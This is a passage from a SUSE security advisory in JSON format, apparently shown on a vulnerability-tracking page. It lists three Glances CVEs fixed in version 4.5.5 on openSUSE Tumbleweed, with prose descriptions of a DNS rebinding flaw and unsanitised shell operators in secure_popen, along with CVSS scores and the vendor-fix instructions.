"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-46608",
"url": "https://www.suse.com/security/cve/CVE-2026-46608"
},
{
"category": "external",
"summary": "SUSE Bug 1268855 for CVE-2026-46608",
"url": "https://bugzilla.suse.com/1268855"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.4,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-25T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-46608"
},
{
"cve": "CVE-2026-46611",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-46611"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, the Glances XML-RPC server (glances -s, implemented in glances/server.py) does not validate the HTTP Host header, leaving it vulnerable to DNS rebinding attacks. An attacker can exploit DNS rebinding to exfiltrate the full system monitoring dataset from a victim\u0027s browser. This vulnerability is fixed in 4.5.5.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-46611",
"url": "https://www.suse.com/security/cve/CVE-2026-46611"
},
{
"category": "external",
"summary": "SUSE Bug 1268856 for CVE-2026-46611",
"url": "https://bugzilla.suse.com/1268856"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-25T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2026-46611"
},
{
"cve": "CVE-2026-53925",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-53925"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. From 4.0.8 until 4.5.5, the secure_popen() function in glances/secure.py interprets \u003e (file redirection), | (pipe), and \u0026\u0026 (command chaining) operators in command strings. These operators are applied without any validation on the target file path, piped command, or chained command. When Application Monitoring Process (AMP) modules load their command or service_cmd configuration values from glances.conf, those values are passed directly to secure_popen() with no sanitization. This allows an attacker who can modify the Glances configuration file to write arbitrary content to arbitrary filesystem paths (via \u003e), chain arbitrary commands (via \u0026\u0026), or pipe command output to arbitrary programs (via |). This vulnerability is fixed in 4.5.5.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-53925",
"url": "https://www.suse.com/security/cve/CVE-2026-53925"
},
{
"category": "external",
"summary": "SUSE Bug 1268984 for CVE-2026-53925",
"url": "https://bugzilla.suse.com/1268984"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-25T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-53925"
}
]
}
Loading…
Trend slope:
-
(linear fit over daily sighting counts)
Show additional events:
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…